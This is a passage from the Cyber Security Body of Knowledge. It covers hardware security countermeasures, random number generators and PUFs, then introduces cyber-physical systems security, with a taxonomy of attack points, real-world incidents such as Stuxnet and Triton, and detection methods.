blinding, or message blinding [1885]. Randomisation applied at register transfer and gate level
is called masking. Masking schemes randomise intermediate values in the calculations so
that their power consumption can no longer be linked with the internal secrets. A large set of
papers on gate level masking schemes is available, ranging from simple Boolean masking
to threshold implementations that are provable secure under certain leakage models [1886].
Randomisation has been effective in practice especially as a public key implementation pro-
tection measure. The protection of secret key algorithms by masking is more challenging.
Some masking schemes require a huge amount of random numbers, others assume leakage
models that do not always correspond to reality. In this context, novel cryptographic tech-
niques summarized under the label leakage resilient cryptography, are developed that are
inherently resistant against side-channel attacks [1887, 1888]. At this stage, there is still a gap
between theory and practice.
Hiding is another major class of countermeasures. The idea is to reduce the signal to noise
ratio by reducing the signal strength. Shielding in the context of TEMPEST is one such example.
Similarly, at gate level, reducing the power signature or electro-magnetic signature of standard
cells or logic modules, will increase the resistance against power or electro-magnetic attacks.
Simple techniques such as using a jittery or drifting clock, and large decoupling capacitances
will also reduce the signal to noise ratio.
Sometimes solutions for leaking at one abstraction level, e.g. power side channels, can be
addressed at a different abstraction level. Therefore, if there is a risk that an encryption key
leaks from an embedded device, a cryptographic protocol that changes the key at a sufficiently
the bits they generate might show bias or correlation or other variations. Hence they don’t
have full entropy. Therefore, they are typically followed by entropy extractors or conditioners.
These building blocks improve the entropy per bit of output. But as the entropy extractor are
deterministic processes, they cannot increase the total entropy. So the output length will be
shorter than the input length.
Due to environmental conditions, e.g. due to temperature or voltage variations, the quality
of the generated numbers might vary over time. Therefore, the standards describe specific
tests that should be applied at the start and continuously during the process of generating
numbers. One can distinguish three main categories of tests. The first one is the total failure
test, applied at the source of entropy. The second ones are online health tests to monitor the
quality of the entropy extractors. The third ones are tests for the post-processed bits. The
requirements for these tests are well described in the different standards and specialized text
books [1894].
The challenge in designing TRNGs is first to provide a clear and convincing proof of the entropy
source, second the design of online tests which at the same are compact and can detect a
wide range of defects [1895]. The topic of attacks, countermeasures and sensors for TRNGs,
especially in the context of IoT and embedded devices, is an active research topic.
characterized by the number of challenge-response pairs they can generate. So-called weak
PUFs are circuits with a finite number of elements, with each element providing a high amount
of entropy. The number of possible challenge-response pairs grows typically linear with the
area of the integrated circuit. Hence they are called weak PUFs. The most well known example
is the SRAM PUF [1897]. These PUFs are typically used for key generation. The raw PUF
output material is not directly usable for key generation as the PUF responses are affected
by noise. Indeed, subsequent readings of the same PUF might result in slightly varying noisy
responses, typically up to 20%. Thus after the entropy extraction follows secure sketch (similar
to error correction) circuits to eliminate the noise and compress the entropy to generate a full
entropy key [1898]. The challenge for the PUF designer is to come up with process variations
and circuits that can be used as key material, but which are not sensitive to transient noise.
A second challenge is to keep all the post-processing modules compact so that the key-
generation PUF can be included in embedded IoT devices.
The second class are the so-called strong PUFs. In this case, the number of challenge-response
pairs grows large, ideally exponential, with the silicon area. The most well-known example
is the arbiter PUF [1899]. A small number of silicon elements are combined together, e.g. to
create a chain of multiplexers or comparators, so that simple combinations of the elements
create the large challenge-response space. Also in this case, the effects of noise in the circuits
needs to be taken into account. Strong PUFs are promised to be useful in authentication
applications, e.g. for access control. Each time a challenge is applied to the PUF, a response
unique to the chip will be sent. The verifier will accept the response if it can be uniquely tied
to the prover. This requires that the PUF responses are registered in a form of a database
beforehand during an enrollment phase.
The problem with strong PUFs is that there is a strong correlation between different challenge-
response pairs of most circuits proposed in literature. Hence all of these circuits are broken
with machine learning techniques [1900] and can not be used for authentication purposes.
The fundamental problem is that very basic, mostly linear operations are used to combine PUF
elements, which makes them easy targets for machine learning attacks. Ideally, these should
be cryptographic or other computationally hard operations resistant to machine learning:
unfortunately these cannot tolerate noise. Light-weight PUF based security protocols are an
active area of research.
20.8.5 Time
The concept of time and the concept of sequence of events are essential in security protocols.
The TCG identifies three types of sequencing: a monotonic counter, a tick counter and actual
trusted time [1850]. A monotonic counter always increases, but the wall clock time between
two increments is unknown. The tick counter increases with a set frequency. It only increases
when the power is on. At power-off the tick counter will reset. Therefore the tick counter is
linked with a nonce and methods are foreseen to link this with a real wall clock time. Trusted
time is the most secure. It makes sure that there is a link between the tick counter and the
real wall clock time. From a hardware viewpoint it will require non-volatile memory, counters,
crystals, continuous power, and an on chip clock generator. The connection to a real wall
clock will require synchronization and an actual communication channel.
The importance of time is placed in a wider context in the Distributed Systems Security
Knowledge Area (Chapter 12).
20.9 CONCLUSION
Hardware security is a very broad topic, covering many different topics. In this chapter, a
classification is made based on the different design abstraction layers. At each abstraction
layer, the threat model, root of trust and security goals are identified.
Because of the growth of IoT, edge and cloud computing, the importance of hardware security
is growing. Yet, in many cases hardware security is in conflict with other performance optimi-
sations, such as low power or limited battery operated conditions. In these circumstances,
performance optimization is the most important design task. Yet it is also the most important
cause of information leakage. This is the case at all abstraction layers: instruction level,
architecture level and logic and circuit level.
Another trend is that hardware is becoming more ‘soft’. This is an important trend in processor
architecture, where FPGA functionality is added to processor architectures. The fundamental
assumption that hardware is immutable is lost here. This will create a whole new class of
attacks.
A last big challenge for hardware security is the lack of EDA tools to support hardware security.
EDA tools are made for performance optimization and security is usually an afterthought. An
added challenge is that it is difficult to measure security and thus difficult to balance security
versus area, throughput or power optimisations.
707
The Cyber Security Body Of Knowledge
www.cybok.org
INTRODUCTION
Cyber-Physical Systems (CPSs) are engineered systems that are built from, and depend upon,
the seamless integration of computation, and physical components. While automatic control
systems like the steam governor have existed for several centuries, it is only in the past
decades that the automation of physical infrastructures like the power grid, water systems,
or chemical reactions have migrated from analogue controls to embedded computer-based
control, often communicating through computer-based networks. In addition, new advances
in medical implantable devices, or autonomous self-driving vehicles are increasing the role of
computers in controlling even more physical systems.
While computers give us new opportunities and functionalities for interacting with the physical
world, they can also enable new forms of attacks. The purpose of this Knowledge Area is to
provide an overview of the emerging field of CPS security.
In contrast with other Knowledge Areas within CyBOK that can trace the roots of their field
back to several decades, the work on CPS security is relatively new, and our community has
not developed yet the same consensus on best security practices compared to cyber security
fields described in other KAs. Therefore, in this document, we focus on providing an overview
of research trends and unique characteristics in this field.
CPSs are diverse and can include a variety of technologies, for example, industrial control
systems can be characterised by a hierarchy of technology layers (the Purdue model [1905]).
However, the security problems in the higher layers of this taxonomy are more related to
classical security problems covered in other KAs. Therefore, the scope of this document
focuses on the aspects of CPSs more closely related to the sensing, control, and actuation of
these systems (e.g., the lower layers of the Purdue model).
The rest of the Knowledge Area is organised as follows. In Section 21.1 we provide an intro-
duction to CPSs and their unique characteristics. In Section 21.2, we discuss crosscutting
security issues in CPSs generally applicable to several domains (e.g., the power grid or vehicle
systems); in particular we discuss efforts for preventing, detecting, and responding to attacks.
In Section 21.3, we summarise the specific security challenges in a variety of CPS domains,
including the power grid, transportation systems, autonomous vehicles, robotics, and medical
implantable devices. Finally, in Section 21.4, we examine the unique challenges CPS security
poses to regulators and governments. In particular, we outline the role of governments in
incentivising security protections for CPSs, and how CPS security relates to national security
and the conduct of war.
CONTENT
Sensors
Actuators s1
a1 Physical
s2
System
a2 a3 s3
s4
Network
c1 c2 c3
Distributed Controllers
Soon after the CPS term was coined, several research communities rallied to outline and
understand how CPSs cyber security research is fundamentally different when compared
to conventional IT cyber security. Because of the crosscutting nature of CPSs, the back-
ground of early security position papers from 2006 to 2009 using the term CPSs, ranged from
real-time systems [1910, 1911], to embedded systems [1912, 1913], control theory [1909], and
cybersecurity [1908, 1913, 1914, 1915, 1916].
While cyber security research had been previously considered in other physical domains—most
notably in the Supervisory Control and Data Acquisition (SCADA) systems of the power
grid [1917]—these previous efforts focused on applying well-known IT cyber security best
practices to control systems. What differentiates the early CPS security position papers was
their crosscutting nature focusing on a multi-disciplinary perspective for CPS security (going
beyond classical IT security). For example, while classical intrusion detection systems monitor
purely cyber-events (network packets, operating system information, etc.), early CPSs papers
bringing control theory elements [1908] suggested that intrusion detection systems for CPSs
could also monitor the physical evolution of the system and then check it against a model of
the expected dynamics as a way to improve attack detection.
CPS is related to other popular terms including the Internet of Things (IoT), Industry 4.0,
or the Industrial Internet of Things, but as pointed out by Edward Lee, the term “CPS” is
more foundational and durable than all of these, because it does not directly reference either
implementation approaches (e.g., “Internet” in IoT) nor particular applications (e.g., “Industry”
in Industry 4.0). It focuses instead on the fundamental intellectual problem of conjoining the
engineering traditions of the cyber and physical worlds [1906].
The rest of this section is organised as follows: in Section 21.1.1, we introduce general proper-
ties of CPS, then in Section 21.1.2, we discuss how physical systems have been traditionally
protected from accidents and failures, and how these protections are not enough to protect
the system against cyber-attacks. We finalise this section by discussing the security and
privacy risks in CPSs along with summarising some of the most important real-world attacks
on control systems in Section 21.1.3.
the expected number of times a packet has to be sent before a one-hop transmission is
successful. While most of the research on wireless sensor networks was done in abstract
scenarios, one of the first real-world successful applications of these technologies was in
large process control systems with the advent of WirelessHART, ISA100, and ZigBee [1922,
1923]. These three communications technologies were developed on top of the IEEE 802.15.4
standard, whose original version defined frames sizes so small, that they could not carry the
header of IPv6 packets. Since Internet-connected embedded systems are expected to grow
to billions of devices in the next years, vendors and standard organisations see the need to
create embedded devices compatible with IPv6. To be able to send IPv6 packets in wireless
standards, several efforts tried to tailor IPv6 to embedded networks. Most notably the Internet
Engineering Task Force (IETF) launched the 6LoWPAN effort, originally to define a standard to
send IPv6 packets on top of IEEE 802.15.4 networks, and later to serve as an adaptation layer
for other embedded technologies. Other popular IETF efforts include the RPL routing protocol
for IPv6 sensor networks, and CoAP for application-layer embedded communications [1924].
In the consumer IoT space some popular embedded wireless protocols include Bluetooth,
Bluetooth Low Energy (BLE), ZigBee, and Z-Wave [1925, 1926].
Control: Finally, most CPSs observe and attempt to control variables in the physical world.
Feedback control systems have existed for over two centuries, including technologies like
the steam governor, which was introduced in 1788. Most of the literature in control theory
attempts to model a physical process with differential equations and then design a controller
that satisfies a set of desired properties such as stability and efficiency. Control systems
were initially designed with analogue sensing and analogue control, meaning that the control
logic was implemented in an electrical circuit, including a panel of relays, which usually
encoded ladder logic controls. Analogue systems also allowed the seamless integration of
control signals into a continuous-time physical process. The introduction of digital electronics
and the microprocessor, led to work on discrete-time control [1927], as microprocessors
and computers cannot control a system in continuous time because sensing and actuation
signals have to be sampled at discrete-time intervals. More recently, the use of computer
networks allowed digital controllers to be further away from the sensors and actuators (e.g.,
pumps, valves, etc.), and this originated the field of networked-controlled systems [1928].
Another recent attempt to combine the traditional models of physical systems (like differential
equations) and computational models (like finite-state machines) is encapsulated in the field
of hybrid systems [1929]. Hybrid systems played a fundamental role in the motivation towards
creating a CPS research program, as they were an example of how combining models of
computation and models of physical systems can generate new theories that enable us to
reason about the properties of cyber- and physical-controlled systems.
Having discussed these general characteristics of CPSs, one caveat is that CPSs are diverse,
and they include modern vehicles, medical devices, and industrial systems, all with differ-
ent standards, requirements, communication technologies, and time constraints. Therefore,
the general characteristics we associate with CPSs might not hold true in all systems or
implementations.
Before we discuss cyber security problems, we describe how physical systems operating
under automatic control systems have been protected from accidents and natural failures, and
how these protections against non-malicious adversaries are not enough against strategic
attackers (i.e., attackers that know that these protections are in place and try to either bypass
them or abuse them).
{
Community emergency response
Organizational
Response Plant emergency response
}
Physical protection (dikes) Physical
Response:
Physical protection (relief devices) Prevention and
Containment
Automatic
Control
Response
{Automatic action: Safety Interlock
System or Emergency Shutdown
}
Critical alarms, operator supervision,
and manual intervention Alarms and
Operator
Basic controls, process alarms, Intervention
and operator supervision
Process design
{
1
SP4 5
Regulatory 2
3
SP7
SP8
7
SP3 SP5
SP2
SP6
4
SP1
Safety: The basic principle recommended by the general safety standard for control systems
(IEC 61508) is to obtain requirements from a hazard and risk analysis including the likelihood
of a given failure, and the consequence of the failure, and then design the system so that the
safety requirements are met when all causes of failure are taken into account. This generic
standard has served as the basis for many other standards in specific industries, for example,
the process industry (refineries, chemical systems, etc.) use the IEC 61511 standard to design
a Safety Instrumented System (SIS). The goal of a SIS is to prevent an accident by, e.g., closing
a fuel valve whenever a high-pressure sensor raises an alarm. A more general defense-in-depth
safety analysis uses Layers of Protection [1930], where hazards are mitigated by a set of layers
starting from (1) basic low priority alarms sent to a monitoring station, to (2) the activation of
SIS systems, to (3) mitigation safeguards such as physical protection systems (e.g., dikes) and
(4) organisational response protocols for a plant emergency response/evacuation. Figure 21.2
illustrates these safety layers of protection.
Protection: A related concept to safety is that of protection in electric power grids. These
protection systems include,
• Protection of Generators: when the frequency of the system is too low or too high, the
generator will be automatically disconnected from the power grid to prevent permanent
damage to the generator.
• Under Frequency Load Shedding (UFLS): if the frequency of the power grid is too low,
controlled load shedding will be activated. This disconnection of portions of the electric
distribution system is done in a controlled manner, while avoiding outages in safety-
critical loads like hospitals. UFLS is activated in an effort to increase the frequency of
the power grid, and prevent generators from being disconnected.
• Overcurrent Protection: if the current in a line is too high, a protection relay will be
triggered, opening the line, and preventing damage to equipment on each side of the
lines.
• Over/Under Voltage Protection: if the voltage of a bus is too low or too high, a voltage
relay will be triggered.
Reliability: While safety and protection systems try to prevent accidents, other approaches
try to maintain operations even after failures in the system have occurred. For example, the
electric system is designed and operated to satisfy the so-called N-1 security criterion, which
means that the system could lose any one of its N components (such as one generator,
substation, or transmission line) and continue operating with the resulting transients dying
out to result in a satisfactory new steady-state operating condition, meaning that the reliable
delivery of electric power will continue.
Fault Tolerance: A similar, but data-driven approach to detect and prevent failures falls under
the umbrella of Fault Detection, Isolation, and Reconfiguration (FDIR) [1931]. Anomalies are
detected using either a model-based detection system, or a purely data-driven system; this
part of the process is also known as Bad Data Detection. Isolation is the process of identifying
which device is the source of the anomaly, and reconfiguration is the process of recovering
from the fault, usually by removing the faulty sensor (if there is enough sensor redundancy in
the system).
Robust Control: Finally, another related concept is robust control [1932]. Robust control deals
with the problem of uncertainty in the operation of a control system. These sources of unknown
operating conditions can come from the environment (e.g., gusts of wind in the operation of
planes), sensor noise, dynamics of the system not modelled by the engineers, or degradation
of system components with time. Robust control systems usually take the envelope of least
favourable operating conditions, and then design control algorithms so that the system
operates safely, even in the worst-case uncertainty.
These mechanisms are not sufficient to provide security: Before CPS security was a main-
stream field, there was a lot of confusion on whether safety, protection, fault-tolerance, and
robust controls were enough to protect CPSs from cyber-attacks. However, as argued over a
decade ago [1909], these protection systems generally assume independent, non-malicious
failures, and in security, incorrect model assumptions are the easiest way for the adversary to
bypass any protection. Since then, there have been several examples that show why these
mechanisms do not provide security. For example Liu et al. [1933] showed how fault-detection
(bad data detection) algorithms in the power grid can be bypassed by an adversary that sends
incorrect data that is consistent with plausible power grid configurations, but at the same time
is erroneous enough from the real values to cause problems to the system. A similar example
for dynamic systems (systems with a “time” component) considers stealthy attacks [1934].
These are attacks that inject small false data in sensors so that the fault-detection system
does not identify them as anomalies but, over a long-period of time, these attacks can drive the
system to dangerous operating conditions. Similarly, the N-1 security criterion in the electric
power grid assumes that if there is a failure, all protection equipment will react as configured,
but an attacker can change the configuration of protection equipment in the power grid. In
such a case, the outcome of an N-1 failure in the power grid will be completely unexpected,
as equipment will react in ways that were unanticipated by the operators of the power grid,
leading to potential cascading failures in the bulk power system. Finally, in Section 21.1.3.1, we
will describe how real-world attacks are starting to target some of these protections against
accidents; for example, the Triton malware specifically targeted safety systems in a process
control system.
Safety vs. Security: The addition of new security defences may pose safety concerns, for
example, a power plant was shutdown because a computer rebooted after a patch [1935].
Software updates and patching might violate safety certifications, and preventing unauthorised
users from accessing a CPS might also prevent first responders from access to the system
in the case of an emergency (e.g., paramedics might need access to a medical device that
prevents unauthorised connections). Security solutions should take these CPS safety concerns
into account when designing and deploying new security mechanisms.
Supervision/
Configuration
Controller
Physical
Actuators Sensors
Process
In general, a CPS has a physical process under its control, a set of sensors that report the
state of the process to a controller, which in turn sends control signals to actuators (e.g., a
valve) to maintain the system in a desired state. The controller often communicates with a
supervisory and/or configuration device (e.g., a SCADA system in the power grid, or a medical
device programmer) which can monitor the system or change the settings of the controller.
This general architecture is illustrated in Figure 21.3.
Attacks on CPSs can happen at any point in the general architecture, as illustrated in Figure 21.4,
which considers eight attack points.
8
Supervision/
Configuration
3
Controller
4 2
5 6 1
Physical
Actuators Sensors
Process
1. Attack 1 represents an attacker who has compromised a sensor (e.g., if the sensor data
is unauthenticated or if the attacker has the key material for the sensors) and injects
false sensor signals, causing the control logic of the system to act on malicious data.
An example of this type of attack is considered by Huang et al. [1940].
2. Attack 2 represents an attacker in the communication path between the sensor and the
controller, who can delay or even completely block the information from the sensors
to the controller, so the controller loses observability of the system (loss of view), thus
causing it to operate with stale data. Examples of these attacks include denial-of-service
attacks on sensors [1941] and stale data attacks [1942].
3. Attack 3 represents an attacker who has compromised the controller and sends incorrect
control signals to the actuators. An example of this attack is the threat model considered
by McLaughlin [1943].
4. Attack 4 represents an attacker who can delay or block any control command, thus
causing a denial of control to the system. This attack has been considered as a denial-
of-service to the actuators [1941].
5. Attack 5 represents an attacker who can compromise the actuators and execute a
control action that is different to what the controller intended. Notice that this attack is
different to an attack that directly attacks the controller, as this can lead to zero dynamics
attacks. These types of attacks are considered by Teixeira et al. [1944].
6. Attack 6 represents an attacker who can physically attack the system (e.g., physically
destroying part of the infrastructure and combining this with a cyber-attack). This type
of joint cyber and physical attack has been considered by Amin et al. [1945].
7. Attack 7 represents an attacker who can delay or block communications to and from the
supervisory control system or configuration devices. This attack has been considered in
the context of SCADA systems [1946].
8. Attack 8 represents an attacker who can compromise or impersonate the SCADA system
or the configuration devices, and send malicious control or configuration changes to
the controller. These types of attacks have been illustrated by the attacks on the power
grid in Ukraine where the attackers compromised computers in the control room of the
SCADA system [1947] and attacks where the configuration device of medical devices
has been compromised [1948].
While traditionally most of the considered attacks on CPSs have been software-based, another
property of CPSs is that the integrity of these systems can be compromised even without a
computer-based exploit in what has been referred to as transduction attacks [1949] (these
attacks represent a physical way to inject false signals, as covered by Attack 1 in Figure 21.4).
By targeting the way sensors capture real-world data, the attacker can inject a false sensor
reading or even a false actuation action, by manipulating the physical environment around
the sensor [1949, 1950]. For example attackers can use speakers to affect the gyroscope of
a drone [1951], exploit unintentional receiving antennas in the wires connecting sensors to
controllers [1952], use intentional electromagnetic interference to cause a servo (an actuator)
to follow the attacker’s commands [1952], or inject inaudible voice commands to digital
assistants [1953].
In addition to security and safety-related problems, CPSs can also have profound privacy
implications unanticipated by designers of new systems. Warren and Brandeis stated in their
seminal 1890 essay The right to privacy [132] that they saw a growing threat from recent inven-
tions, like “instantaneous photographs” that allowed people to be unknowingly photographed,
and new media industries, such as newspapers, that would publish photographs without their
subjects’ consent. The rise of CPS technologies in general, and consumer IoT in particular,
are similarly challenging cultural assumptions about privacy.
CPS devices can collect physical data of diverse human activities such as electricity con-
sumption, location information, driving habits, and biosensor data at unprecedented levels of
granularity. In addition, the passive manner of collection leaves people generally unaware of
how much information about them is being gathered. Furthermore, people are largely unaware
that such collection exposes them to possible surveillance or criminal targeting, as the data
collected by corporations can be obtained by other actors through a variety of legal or illegal
means. For example, automobile manufacturers are remotely collecting a wide variety of
driving history data from cars in an effort to increase the reliability of their products. Data
known to be collected by some manufacturers include speed, odometer information, cabin
temperature, outside temperature, battery status, and range. This paints a very detailed map
of driving habits that can be exploited by manufacturers, retailers, advertisers, auto insurers,
law enforcement, and stalkers, to name just a few.
Having presented the general risks and potential attacks to CPSs we finalise our first section by
describing some of the most important real-world attacks against CPSs launched by malicious
attackers.
Control systems have been at the core of critical infrastructures, manufacturing and industrial
plants for decades, and yet, there have been few confirmed cases of cyber-attacks (here we
focus on attacks from malicious adversaries as opposed to attacks created by researchers
for illustration purposes).
Non-targeted attacks are incidents caused by the same attacks that classical IT computers
may suffer, such as the Slammer worm, which was indiscriminately targeting Windows servers
but that inadvertently infected the Davis-Besse nuclear power plant [1954] affecting the ability
of engineers to monitor the state of the system. Another non-targeted attack example was a
controller being used to send spam in a water filtering plant [1955].
Targeted attacks are those where adversaries know that they are targeting a CPS, and there-
fore, tailor their attack strategy with the aim of leveraging a specific CPS property. We look in
particular at attacks that had an effect in the physical world, and do not focus on attacks used
to do reconnaissance of CPSs (such as Havex or BlackEnergy [1956]).
The first publicly reported attack on an SCADA system was the 2000 attack on Maroochy
Shire Council’s sewage control system1 in Queensland, Australia [1958], where a contractor
who wanted to be hired for a permanent position maintaining the system used commercially
available radios and stolen SCADA software to make his laptop appear as a pumping station.
During a 3-month period the attacker caused more than 750,000 gallons of untreated sewage
water to be released into parks, rivers, and hotel grounds causing loss of marine life, and
jeopardising public health. The incident cost the city council $176,000 in repairs, monitor-
ing, clean-ups and extra security, and the contractor company spent $500,000 due to the
incident [1959].
In the two decades since the Maroochy Shire attack there have been other confirmed attacks
on CPSs [1960, 1961, 1962, 1963, 1964, 1965, 1966, 1967, 1968]. However, no other attack has
demonstrated the new sophisticated threats that CPSs face like the Stuxnet worm (discovered
in 2010) targeting the Nuclear enrichment program in Natanz, Iran [701]. Stuxnet intercepted
requests to read, write, and locate blocks on a Programmable Logic Controller (PLC). By
intercepting these requests, Stuxnet was able to modify the data sent to, and returned from, the
PLC, without the knowledge of the PLC operator. The more popular attack variant of Stuxnet
consisted in sending incorrect rotation speeds to motors powering centrifuges enriching
Uranium, causing the centrifuges to break down so that they needed to be replaced. As a
result, centrifuge equipment had to be replaced regularly, slowing down the amount of enriched
Uranium the Natanz plant was able to produce.
Two other high-profile confirmed attacks on CPSs were the December 2015 and 2016 attacks
against the Ukrainian power grid [1969, 1970]. These attacks caused power outages and
clearly illustrate the evolution of attack vectors. While the attacks in 2015 leveraged a remote
access program that attackers had on computers in the SCADA systems of the distribution
power companies, and as such a human was involved trying to send malicious commands,
the attacks in 2016 were more automated thanks to the Industroyer malware [1971] which had
knowledge of the industrial control protocols these machines use to communicate and could
automatically craft malicious packets.
The most recent example in the arms race of malware creation targeting control systems
1
There are prior reported attacks on control systems [1957] but there is no public information corroborating
these incidents and the veracity of some earlier attacks has been questioned.
is the Triton malware [1972] (discovered in 2017 in the Middle-East) which targeted safety
systems in industrial control systems. It was responsible for at least one process shutting
down. Stuxnet, Industroyer, and Triton demonstrate a clear arms race in CPS attacks believed
to be state sponsored. These attacks will have a profound impact on the way cyber-conflicts
evolve in the future and will play an essential part in how wars may be waged, as we discuss
in the last section of this chapter.
or latency, may not be acceptable [1992]. For symmetric cryptography, NIST has plans for the
standardisation of a portfolio of lightweight cryptographic algorithms [1993] and the current
CAESAR competition for an authenticated-encryption standard is evaluating the performance
of their submissions in resource-constrained devices [1994]. For public-key algorithms, Elliptic
Curve Cryptography generally offers the best balance of performance and security guarantees,
but other lightweight public-key algorithms might be more appropriate depending on the
requirements of the system [1995]. When it comes to exploit mitigation, the solutions are
less clear. Most deeply embedded devices do not have support for data execution prevention,
address space layout randomisation, stack canaries, virtual memory support, or cryptographi-
cally secure random number generators. In addition system-on-chip devices have no way to
expand their memory, and real-time requirements might pose limitations on the use of virtual
memory. However, there are some efforts to give embedded OS better exploit mitigation
tools [1996].
Secure Microkernels: Another OS security approach is to try to formally prove the security
of the kernel. The design of secure operating systems with formal proofs of security is an
effort dating back to the Orange Book [1014]. Because the increasing complexity of code in
monolithic kernels makes it hard to prove that operating systems are free of vulnerabilities,
microkernel architectures that provide a minimal core of the functionality of an operating
system have been on the rise. One example of such a system is the seL4 microkernel, which is
notable because several security properties have been machine-checked with formal proofs of
security [1034]. DARPA’s HACMS program [1997] used this microkernel to build a quadcopter
with strong safety and security guarantees [1997].
Preventing Transduction Attacks: As introduced in the previous section, transduction attacks
represent one of the novel ways in which CPS security is different from classical IT security.
Sensors are transducers that translate a physical signal into an electrical one, but these
sensors sometimes have a coupling between the property they want to measure, and another
analogue signal that can be manipulated by the attacker. For example, sound waves can affect
accelerometers in wearable devices and make them report incorrect movement values [1998],
and radio waves can trick pacemakers into disabling pacing shocks [1999]. Security counter-
measures to prevent these attacks include the addition of better filters in sensors, improved
shielding from external signals, anomaly detection, and sensor fusion [1950]. Some specific
proposals include: drilling holes differently in a circuit board to shift the resonant frequency
out of the range of the sensor, adding physical trenches around boards containing speakers
to reduce mechanical coupling, using microfiber cloths for acoustic isolation, implement-
ing low-pass filters that cut-off coupled signals, and secure amplifiers that prevent signal
clipping [1949, 1998].
security hardware in the device, but it has weak security guarantees and usually requires
wireless range between the verifier and the device being checked. In contrast, hardware-based
attestation (e.g., attestation with the support from a TPM, TrustZone or SGX) provides stronger
security, but requires dedicated secure hardware in CPSs devices, which in turn increases
their cost, which might not be affordable in some low-end embedded systems. Hybrid ap-
proaches attempt to find a middle ground by reducing the secure hardware requirements
while overcoming the security limitations of pure software-based approaches [1865, 2004].
The minimal secure hardware requirements include a secure place to store the secret key,
and safe code that has exclusive access to that key. A challenge for hybrid attestation is
the fact that it needs to be non-interruptible and atomic (it has to run from the beginning
to the end), and the (so far) relatively long (5-7 seconds [1865, 2004]) secure measurement
of embedded memory might not be applicable for safety-critical real-time applications. In
addition to academic work, industry is also developing standards to enhance the security of
embedded systems with minimal silicon requirements. For example, the Trusted Computing
Group (TCG) Device Identifier Composition Engine (DICE) is working on combining simple
hardware capabilities to establish strong identity, attest software, and security policy, and
assist in deploying software updates. We finalise our description of attestation by pointing
out that most of the practical proposals for attestation work for initialisation, but building
practical run-time attestation solutions remains a difficult challenge.
Network Intrusion Detection: The second category of solutions for detecting attacks relies
on monitoring the interactions of CPS devices. In contrast with classical IT systems, where
simple Finite-State models of network communications will fail, CPSs exhibit comparatively
simpler network behaviour: servers change less frequently, there is a more stable network
topology, a smaller user population, regular communication patterns, and networks host
a smaller number of protocols. Therefore, intrusion detection systems, anomaly detection
algorithms, and white listing access controls are easier to design and deploy than in classical
IT systems [2005]. If the CPS designer can give a specification of the intended behaviour of the
network, then any non-specified traffic can be flagged as an anomaly [2006]. Because most
of the communications in CPS networks are between machines (with no human intervention),
they happen automatically and periodically, and given their regularity, these communication
patterns may be captured by finite state models like Deterministic Finite Automata [2007, 2008]
or via Discrete-Time Markov Chains [2009, 2010]. While network specification is in general
easier in CPS environments when compared to IT, it is still notoriously difficult to maintain.
Physics-Based Attack Detection: The major distinction of control systems with respect to
other IT systems is the interaction of the control system with the physical world. In contrast
to work in CPS intrusion detection that focuses on monitoring “cyber” patterns, another line of
work studies how monitoring sensor (and actuation) values from physical observations, and
control signals sent to actuators, can be used to detect attacks; this approach is usually called
physics-based attack detection [1974]. The models of the physical variables in the system
(their correlations in time and space) can be purely data-driven [2011], or based on physical
models of the system [1934]. There are two main classes of physical anomalies: historical
anomalies and physical-law anomalies.
Historical Anomalies: identify physical configuration we have not seen before. A typical
example is to place limits on the observed behaviour of a variable [2012]. For example if during
the learning phase, a water level in a tank is always between 1m and 2m, then if the water
level ever goes above or below these values we can raise an alert. Machine learning models
of the historical behaviour of the variables can also capture historical correlations of these
variables. For example, they can capture the fact that when the tank of a water-level is high, the
water level of a second tank in the process is always low [2013]. One problem with historical
anomalies is that they might generate a large number of false alarms.
Physical-Law Anomalies: A complementary approach to historical observations that may
have fewer false alarms, is to create models of the physical evolution of the system. For
example we have a sensor that monitors the height of a bouncing ball, then we know that
this height follows the differential equations from Newton’s laws of mechanics. Thus, if a
sensor reports a trajectory that is not plausible given the laws of physics, we can immediately
identify that something is not right with the sensor (a fault or an attack). Similarly, the physical
properties of water systems (fluid dynamics) or the power grid (electromagnetic laws) can be
used to create time series models that we can then use to confirm that the control commands
sent to the field were executed correctly and that the information coming from sensors is
consistent with the expected behaviour of the system. For example, if we open an intake valve
we should expect that the water level in the tank should rise, otherwise we may have a problem
with the control, actuator, or the sensor. Models of the physical evolution of the system have
been shown to be better at limiting the short-term impact of stealthy attacks (i.e., attacks
where the attacker creates a malicious signal that is within the margin of error of our physical
models) [2014]. However, if the attack persists for a long time and drives the system to an
unsafe region by carefully selecting a physically plausible trajectory, then historical models
can help in detecting this previously unseen state [2015].
In addition to the physics of the system being controlled, devices (such as actuators) have
dynamics as well, and these physical properties can also be used to monitor the proper
behaviour of devices [2016].
Out-of-band Detection: Another way to passively monitor the physical system is through
out-of-band channels [2017]. For example, Radio Frequency-based Distributed Intrusion Detec-
tion [2018] monitors radio frequency emissions from a power grid substation in order to check
if there are malicious circuit breaker switching, transformer tap changes, or any activation of
protecting relays without the direct request sent from the SCADA server. The basic idea is to
correlate control commands sent by the SCADA server, with the radio frequency emissions
observed in the substation. A potential drawback with this approach is that attackers can
launch RF attacks mimicking the activation of a variety of electric systems, which can lead to
security analysts losing confidence in the veracity of the alerts.
Active Detection: In addition to passively monitoring a CPS, an intrusion detection system can
actively query devices to detect anomalies in how devices respond to these requests [2019].
In addition to a network query, the intrusion detection system can also send a physical chal-
lenge to change the system’s physical behaviour. This approach is also known as physical
attestation [2013, 2020, 2021], where a control signal is used to alter the physical world, and
in response, it expects to see the changes done in the physical world reflected in the sensor
values. For example, we can send signals to change the network topology of the power grid
to see if the sensors report this expected change [2022], use a change in the field of vision of
a camera to detect hacked surveillance cameras [2023], or use a watermarking signal in a
control algorithm [2024]. The concept of active detection is related to research on moving
target defence applied to cyber-physical systems [2025, 2026, 2027, 2028]. However, both
active detection and moving target defence might impose unnecessary perturbations in a sys-
tem by their change of the physical world for security purposes. Therefore, these techniques
might be too invasive and costly. Consequently, the practicality of some of these approaches
is uncertain.
Control systems have a layered hierarchy [1905], which can be used for network segmentation
and to ensure access control. Figure 21.5 shows an illustration of the lower layers of this
hierarchy.
The top layers operate using mostly traditional Information Technology: computers, operating
systems, and related software. They control the business logistic system, which manages the
basic plant production schedule, material use, shipping and inventory levels, and also plant
performance, and keep data historians for data-driven analytics (e.g., predictive maintenance).
The supervisory control layer is where the Supervisory Control and Data Acquisition (SCADA)
systems and other servers communicate with remote control equipment like Programmable
Logic Controllers (PLCs) and Remote Terminal Units (RTUs). The communication between
servers in a control room and these control equipment is done via a Supervisory Control
Network (SCN).
Regulatory control is done at the lower layer, which involves instrumentation in the field, such
as sensors (thermometers, tachometers, etc.) and actuators (pumps, valves, etc.). While
